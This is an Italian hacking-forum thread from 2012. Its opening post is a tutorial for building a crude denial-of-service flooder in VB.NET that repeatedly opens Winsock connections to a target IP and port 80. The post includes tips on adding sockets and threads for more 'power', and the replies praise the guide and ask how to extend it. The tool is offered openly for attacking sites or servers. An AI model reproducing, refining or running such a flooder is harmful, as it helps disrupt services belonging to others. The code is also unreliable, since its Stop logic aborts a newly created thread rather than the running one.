Guida- Creare un programma che simuli un attacco DoS

« Older   Newer »
  Share  
_p0six_
CAT_IMG Posted on 26/2/2012, 15:13     +1   -1




Ciao a tutti utenti di AlienHack, oggi vi volevo presentare una guida, interamente fatta da me, su come creare un programma che simuli un attacco DoS(Denial of Service). In caso non sappiate cosa sia vi consiglio di vedere quest'altra guida fatta da me, che la potrete vedere QUI. Questo è un pseudoDoS, quindi non è potentissimo.
Requisiti:
Qualunque versione dell'IDE(che non sia Visual Basic 6), lo potete scaricare da Visual Studio 2008 & Visual Studio 2010
Il componente ActiveX Winsock(anche detto AxWinsock)
Conoscienze basiliari su Visual Basic.Net
Preparazione
Aprite la versione che avete di Visual Studio e create un nuovo progetto.Fate:
File>Nuovo Progetto>Selezionate Windows Forms Application> Scegliere nome progetto> Pigiare OK.
Una volta fatto Modificate a vostro piacimento il form stando attenti di inserire 2 Textbox, 2 Button e 1 Winsock e 1 label. Per inserire winsock Fate cosi:
Tasto destro sulla barra dei componenti>Scegli componenti( io ho la versione in inglese quindi mi viene Choose Items), Selezionare Componenti COM> Cercare Microsoft WinSock Control, version 6.0> Una volta trovata cliccate nel quadratino accanto( quindi Checcate)> Pigiare su applica> OK.
Vi troverete il componente WInsock nella barra dei componenti.Quindi aggiungere 1 winsock. Rinominate il Button1 in Start, mentre il Button2 in Stop, label1 in 0. La textbox 1 servirà per mettere l'ip del Sito/server, mentre la textbox2 indicherà la porta, in questo caso 80. Fate doppio click su Start e scrivete questo sotto Public Class Form1:
CODICE
'///Created by p0sixering////
private sub winsock()
try
Do
axwinsock1.remoteport=textbox2.text
axwinsock1.remotehost=textbox1.text
axwinsock1.connect
label1.text+=1
Loop
Catch ex as exception
thread.abort
MsgBox(ex.tostring)
end try
end sub

Benissimo, non sto a spiegare perchè immagino sappiate le conoscienze basiliari, se volete spiegazione scrivete in questo thread. Ora fare doppio click nel pulsante Start e scrivere questo:
CODICE
dim thread as new system.threading.thread(addressof Winsock)
Thread.start()

Pigiare due volte nel pulsante Stop e scrivere questo:
CODICE
dim thread as new system.threading.thread(addressof Winsock)
thread.abort

Pigiare due volte nel form1 e scrivere:
CODICE
Control.Checkforillegalcrossthreadcalls=false

Bene, la guida è finita, se volete aumentare la potenza basta aggiungere altri winsock, aggiungere altri:
CODICE
dim thread as new system.threading.thread(addressof Winsock)
quanti sono i winsock rinominando thread in thread1, thread2 e così via e aggiungere i thread opportuni, in questo caso i winsock. Oppure aggiungendo un ciclo for/to.Chi non avesse capito come migliorarlo è pregato di inviarmi un PM. Grazie
Guida: MIA 100%
p0sixering
PS: Non mi sono tanto impegnato in questa guida, andavo di fretta ;)


Edited by _p0six_ - 8/3/2012, 11:41
 
Top
~ReNaples~
CAT_IMG Posted on 26/2/2012, 15:51     +1   -1




WoW, ottimo bravissimo Guida ottima.... Cosi molte persone si possono rendere conto con questa guida,
Bravo!
Metto Rilievo.
 
Top
DestructionHack
CAT_IMG Posted on 26/2/2012, 18:47     +1   -1




Bellissimo
Anche per i più inesperti come me
a me mi serviva
Voto : 11/10
 
Top
LucaRHCP
CAT_IMG Posted on 28/2/2012, 18:48     +1   -1




Grande, davvero un'ottima guida, mi è servita tantissimo.
Voto= 10/10
^_^
 
Top
DestructionHack
CAT_IMG Posted on 14/3/2012, 19:23     +1   -1




Casomai ha detto vStudio non vBasic...
 
Top
hackermaster
CAT_IMG Posted on 6/5/2012, 18:37     +1   -1




ehi posixering come faccio a usare i socket anziche i winsock??? e poi come mai mi da errore se uso i winsock???
 
Top
5 replies since 26/2/2012, 15:13   601 views
  Share